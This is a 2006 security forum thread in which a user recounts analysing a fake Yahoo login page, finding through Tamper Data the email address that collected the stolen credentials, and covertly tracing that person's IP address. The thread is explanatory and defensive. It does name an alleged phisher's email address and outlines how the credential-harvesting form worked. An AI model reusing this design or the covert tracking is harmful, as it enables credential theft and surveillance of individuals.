.

When I was phished?

<<

morpheus063

User avatar

Sr. Member
Sr. Member

Posts: 393

Joined: Sun Jun 25, 2006 10:08 am

Location: Cochin - India

Post Sun Sep 17, 2006 5:36 am

When I was phished?

Hi All,

I would like to share with you a phishing experience I had to face recently.

For those who need an introduction on Phishing:
Phishing and Identity Theft
In computing, phishing is a form of criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well.

Phishing techniques
Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers.



Recently I received an instant message (yahoo) from one of my friend who is not very good with the technical aspects of Internet. He is just a common internet user. The message recieved :
http://www.geocities.com/chakkkara_ummma/yahoo.html
Click this link and login ur yahoo id, u will get a wonderful gift enjoy. pls send this message to all ur buddies


As a normal enthusiastic user, we all have the tendency to open the link. When a user clicks on the above link, it opens a page as displayed below:

Image

If you look closely at the displayed page, it looks very similar to yahoo login page. However, it is not a yahoo page. The cracker (lets not call him a hacker, as hacking is never un-ethical) has smartly created a web page which looks very similar to the login page of yahoo. When an novice user fills in the page with his username and password, and click the Sign In button, on the back ground, the entered user credentials (username and password) is sent to some database / email ID. My Friend entered his username and password unknowingly and .....So I decided to find the culprit.

Lets Find The Culprit

Using Tamper Data (an add-on for mozilla firefox), I captured the informations sent through this web page. See the below screen shot:

Image

If you look at the above image very closely, you can easily understand the following facts (refer the red lines):

* When the user clicks the Sign In button, the page is re-directed to http://www2.fiberbit.net/form/mailto.cgi
* The page (or the script) is programmed in such a way that a mail will be sent to love.cynade@gmail.com. (refer the field "Mail_To")
* The mail will appear to come as if from SpArKz (refer the field "Mail_From")
* Once the mail is send, the page will be automatically redirected to http://photos.yahoo.com. (refer the field "Next_Page")

So we have found the cracker here. The person's email ID is love.cynade@gmail.com.

A step further.
Using the same tool mentioned above, the data send from a web page can be altered. So what I have done is, I changed the "Mail_To" value from love.cynade@gmail.com (internally the email id love.cynade@gmail.com is represented as love.cynade%40gmail.com) to xxxx.zzzzzzzz@gmail.com (my email ID). And hurray, i got the details delivered in my mail box. See the below screen shot:

Image

It displayed the full information about the user who visited the site which includes:

* The ISP of the User - in my case it is Asianet.co.in.
* The IP address of the user - in my case it is 202.**.227.*** (not displayed due to various security reasons)
* These information can be further used to get into your personal system.

Tracing Down the Cracker
To trace the location of the hacker who was using the email ID love.cynade@gmail.com, I created a temperory email ID, registered a temperory account with ReadNotify.com and shooted some mails to love.cynade@gmail.com. And hooray, when he opened the mails I got the IP address of him and thats it.

I wrote to Yahoo also regarding the same and they immediately removed the site from Geocities and replied back. And withing weeks yahoo changed their login screen also. The cracker was able to get into many compromised accounts and from there to many accounts like banks, e-commerce sites etc using this simple techniques.

The Above quoted URL is currently not available as it is removed by Yahoo. But there are still thousands of phishing sites available that may exploit the human factor of the internet technology.

Do you have any similar experiences - share it here - what ways the hacker approached you? ......

Regards,

The Morpheus
Manu Zacharia
MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP,
Certified ISO 27001:2005 Lead Auditor

[b]There are 3 roads to spoil; women, gambling & hacking. The most pleasant with women, the quickest with gambling, but the surest is hacking - c0c0n
<<

Kev

Post Mon Sep 18, 2006 1:55 pm

Re: When I was phished?

  Good of you to take the time to do all of that. I guess if more of us did that it would be helpful.  I have found ReadNotify is a useful tool, but can be spoofed sometimes.  Oh, you slipped and called the cracker a hacker at the end of your post, lol!  Any way, keep up the good work.
<<

jimbob

Post Mon Sep 18, 2006 2:17 pm

Re: When I was phished?

Firstly well done that man. I enjoyed your story, so I'll share one of mine.

I recently had a colleague who said, "My ebay account has been hacked." Alarm bells started ringing and I asked why he thought that was the case. "I got an email from ebay telling me so." This guy was no fool. I'm suprised he [almost] fell for it but glad he came to me first. Fear of identity theft made him believe he had been a victim, one of the oldest tricks in the phisher's toolkit.

I pointed out the signs that the email was fake. The URL was not an ebay website, all the usual tell tales. We should educate our friends, family and peers but need to do it right. If all we do is scare them we can inadvertantly feed the beast.

Jim
<<

LSOChris

Post Mon Sep 18, 2006 4:56 pm

Re: When I was phished?

great post!
<<

don

User avatar

Administrator
Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Wed Sep 20, 2006 1:30 pm

Re: When I was phished?

I agree, so I submitted it to digg:

http://digg.com/security/When_I_Was_Phished

Don
CISSP, MCSE, CSTA, Security+ SME

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software